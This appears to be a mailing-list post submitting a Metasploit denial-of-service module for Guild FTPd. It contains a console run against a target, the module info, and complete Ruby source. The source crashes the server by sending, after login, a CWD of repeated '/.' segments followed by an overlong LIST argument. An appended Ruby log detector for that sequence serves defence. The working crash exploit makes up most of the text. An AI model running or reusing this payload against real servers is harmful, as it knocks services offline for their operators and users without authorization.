Hey guys,

I've attached a new DoS auxiliary module for Guild FTPd versions 0.999.8.11
and 0.999.14.  It's based on the Python script from yesterday which says it
works for these versions, but I've only been able to test it on the latter.

This module needs the patch I sent a few minutes ago fixing banner grabbing in
Exploit::Remote::Ftp.

msf > use dos/windows/ftp/guildftp_cwdlist
msf auxiliary(guildftp_cwdlist) > set RHOST 192.168.10.2
RHOST => 192.168.10.2
msf auxiliary(guildftp_cwdlist) > set FTPUSER test
FTPUSER => test
msf auxiliary(guildftp_cwdlist) > set FTPPASS test
FTPPASS => test
msf auxiliary(guildftp_cwdlist) > run
[*] Connecting to FTP server 192.168.10.2:21...
[*] Connected to target FTP server.
[*] Authenticating as test with password test...
[*] Sending password...
[*] Sending commands...
[*] Auxiliary module execution completed


msf auxiliary(guildftp_cwdlist) > info

       Name: Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
    Version: 1

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FTPPASS  test             yes       Valid FTP password for username
  FTPUSER  test             yes       Valid FTP username
  RHOST    192.168.10.2     yes       The target address
  RPORT    21               yes       The target port

Description:
  Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap
  corruption. You need to have a valid login so you can run CWD and
  LIST.


Thanks,
Kris Katterjohn

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::Ftp

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Guild FTPd 0.999.8.11/0.999.14 Heap Corruption',
                        'Description'    => %q{
                                Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable
                                to heap corruption.  You need to have a valid login
                                so you can run CWD and LIST.
                        },
                        'Author'         => 'Kris Katterjohn <[EMAIL PROTECTED]>',
                        'License'        => MSF_LICENSE,
                        'Version'        => '1',
                        'References'     =>
                                [ [ 'URL', 'http://milw0rm.com/exploits/6738'] ],
                        'DisclosureDate' => 'Oct 12 2008'))

                # They're required
                register_options([
                        OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
                        OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
                ])
        end

        def run
                connect_login

                print_status("Sending commands...")

                # We want to try to wait for responses to these
                raw_send_recv("CWD #{'/.' * 124}\r\n")
                raw_send_recv("LIST #{'X' * 100}\r\n")

                disconnect
        end
end
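
For the defending side, the command sequence the module sends (a CWD argument made of repeated "/." segments, then a LIST with a long argument, in one authenticated session) can be matched in FTP command logs. The following is an added example, not part of the original post or of Metasploit; the log format "<session> <VERB> [argument]", the thresholds, and all function names are assumptions.

```ruby
# Flag FTP sessions that send a CWD of repeated "/." segments followed by a
# LIST with a long argument. Log format and thresholds are assumptions.
CWD_DOT_RUN      = /(?:\/\.){32,}/   # assumed: 32+ consecutive "/." segments
LIST_ARG_LEN_MIN = 64                # assumed: minimum suspicious LIST argument

# Parse one line of the assumed format "<session> <VERB> [argument]".
def parse_ftp_log_line(line)
  session, verb, arg = line.chomp.split(' ', 3)
  return nil if session.nil? || verb.nil?
  { session: session, verb: verb.upcase, arg: arg.to_s }
end

# True when the CWD argument contains a long run of "/." segments.
def suspicious_cwd?(arg)
  arg.match?(CWD_DOT_RUN)
end

# Return the session ids where a suspicious CWD is later followed by a long LIST.
def detect_cwd_list_sequence(lines)
  primed  = {}   # session => true once a suspicious CWD was seen
  flagged = []
  lines.each do |line|
    ev = parse_ftp_log_line(line)
    next unless ev
    case ev[:verb]
    when 'CWD'
      primed[ev[:session]] = true if suspicious_cwd?(ev[:arg])
    when 'LIST'
      hit = primed[ev[:session]] && ev[:arg].length >= LIST_ARG_LEN_MIN
      flagged << ev[:session] if hit && !flagged.include?(ev[:session])
    when 'QUIT'
      primed.delete(ev[:session])   # session ended, forget its state
    end
  end
  flagged
end

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
  "s1 CWD /pub/docs",
  "s1 LIST",
  "s2 CWD #{'/.' * 124}",
  "s2 LIST #{'X' * 100}",
  "s3 CWD #{'/.' * 124}",
  "s3 LIST -la",
  "s4 LIST #{'X' * 100}"
].freeze

puts detect_cwd_list_sequence(SAMPLE_LOG).inspect
```

Only the session that shows both commands in order is reported; a long CWD or a long LIST on its own is left alone to keep false positives down.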
